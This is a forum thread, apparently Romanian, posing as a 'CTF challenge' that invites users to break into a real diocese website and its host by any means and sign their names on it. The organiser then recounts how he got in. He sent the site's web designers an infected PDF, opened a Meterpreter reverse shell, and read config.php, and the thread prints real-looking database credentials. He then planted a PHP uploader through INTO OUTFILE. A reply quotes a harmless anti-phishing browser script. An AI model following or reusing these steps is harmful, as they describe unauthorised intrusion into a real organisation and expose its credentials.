Jump to content
neo.hapsis

Easy challenge 4 fun (put your name)

By neo.hapsis, in Challenges (CTF)

Recommended Posts

neo.hapsis Newbie

neo.hapsis

Posted
Posted (edited)

[+] Target : Diocesi di Pozzuoli

[+] Method : No matter (sql injection,ftp,ssh bruter,metasploit handling)

[+] Requierements : Attack the website (no matter how) or

attack to their host (metasploit,ftp,ssh etc) and put your name in the list who was here.And refresh the new link

Proof

|Challenge put your name on list|

SOLVERS

1. Wubi

2. Co4ie

3. Zykraxx

4. ps-axl

5. oul

6. K01N

7. DaNNy.BV

Goodluck!

Edited by neo.hapsis
Link to comment
Share on other sites
Robert1995 Newbie

Robert1995

Posted
Posted

Doar o intrebare, ce legatura au credit cardurile cu pagina aceea ?


    <script language="JavaScript" type="text/javascript" id="wrc-script-middle_window">
      var g_inputsCnt = 0;
      var g_InputThis = new Array(null, null, null, null);
      var g_alerted = false;
      /* we test the input if it includes 4 digits   (input is a part of 4 inputs for filling the credit-card number)*/function is4DigitsCardNumber(val){
        var regExp = new RegExp('[0-9]');
        return (val.length == 4 && val.search(regExp) == 0);
      }/* testing the whole credit-card number 19 digits devided by three '-' symbols or   exactly 16 digits without any dividers*/function 
	  isCreditCardNumber(val){
        if(val.length == 19)	{
          var regExp = new RegExp('[0-9]-[0-9]-[0-9]-[0-9]');
          return (val.search(regExp) == 0);
        }
        else if(val.length == 16)	{
          var regExp = new RegExp('[0-9][0-9][0-9][0-9]');
          return (val.search(regExp) == 0);
        }
        return false;
      }function CheckInputOnCreditNumber(self){
        if(g_alerted)		return false;
        var value = self.value;
        if(self.type == 'text')	{
          if(is4DigitsCardNumber(value))		{
			var cont = true;
          for(i = 0; i < g_inputsCnt; i++)				if(g_InputThis[i] == self)					cont = false;
          if(cont && g_inputsCnt < 4)			{
            g_InputThis[g_inputsCnt] = self;
            g_inputsCnt++;
          }
		}
      g_alerted = (g_inputsCnt == 4);
      if(g_alerted)			g_inputsCnt = 0;
      else			g_alerted = isCreditCardNumber(value);
	}
  return g_alerted;
}function CheckInputOnPassword(self){
  if(g_alerted)		return false;
  var value = self.value;
  if(self.type == 'password')	{
    g_alerted = (value.length > 0);
  }
  return g_alerted;
}function onInputBlur(self, bRatingOk, bFishingSite){
  var bCreditNumber = CheckInputOnCreditNumber(self);
  var bPassword = CheckInputOnPassword(self);
  if((!bRatingOk || bFishingSite == 1) && (bCreditNumber || bPassword) )	{
    var warnDiv = document.getElementById("wrcinputdiv");
    if(warnDiv)		{
      /* show the warning div in the middle of the screen */			warnDiv.style.left = "0px";
      warnDiv.style.top = "0px";
      warnDiv.style.width = "100%";
      warnDiv.style.height = "100%";
      document.getElementById("wrc_warn_fs").style.display = 'none';
      document.getElementById("wrc_warn_cn").style.display = 'none';
      if(bFishingSite)				document.getElementById("wrc_warn_fs").style.display = 'block';
      else				document.getElementById("wrc_warn_cn").style.display = 'block';
      warnDiv.style.display = 'block';
    }
  }
}
  </script>

Link to comment
Share on other sites
neo.hapsis Newbie

neo.hapsis

Posted
  • Author
Posted

Challeng-ul sa terminat!

Solvers: 7

Views: 1,084

Cred ca multi ati reusit challengul cu atacu:sql injection urmand pasi:

1.Aflarea parola de admin

2.Logare in area de admnistrare

3.Modificare vreunui script sau fisierul php cu uplodarea unui shell

4.Navigare la directorul respectiv si includere nickul in fiserul index.html

Eu personal m-am folosit atacarea webdesignerilor sai cu metoda : Client Side attack pdf file infection.

1.Trimiterea unei e-mail la adresa webdesignerilor cu un fisier pdf infectat

2.Folosind si windows/shell/reverse_tcp [sa nu le confundam cu windows/shell_reverse_tcp]

[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.1.120:455 -> 89.31.72.209:49322)

3.Citirea fisierului de configurare ptr a intra in baza de date

cat config.php
"HOST" => "mysql512.sqlhosting.it",
"NAME" => "infobacoli_it_wp",
"USER" => "roilin43_wp",
"PASSWD" => "infowp"

4 Intrarea in baza de date si crearea unei tabel tmp(codetab txt)

5.Inserarea valori a unei fisier php uploader in tabelul tmp

6.Folosirea INTO OUTFILE .... from tmp

7.Navigarea la locatia fisierului uplodat si cerere info ptr user si pass

De la punctul 3-6 am facut din pura curozitate si plictiseala ,puteam sa uplodez direct din metasploit

Va multumesc tuturor competitorilor care au participat la challenge!

Sunt curios cei care le-au rezolvat cum le a putut rezolva...sunt curios si la rezolvarea lui DaNNY.BV :D

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...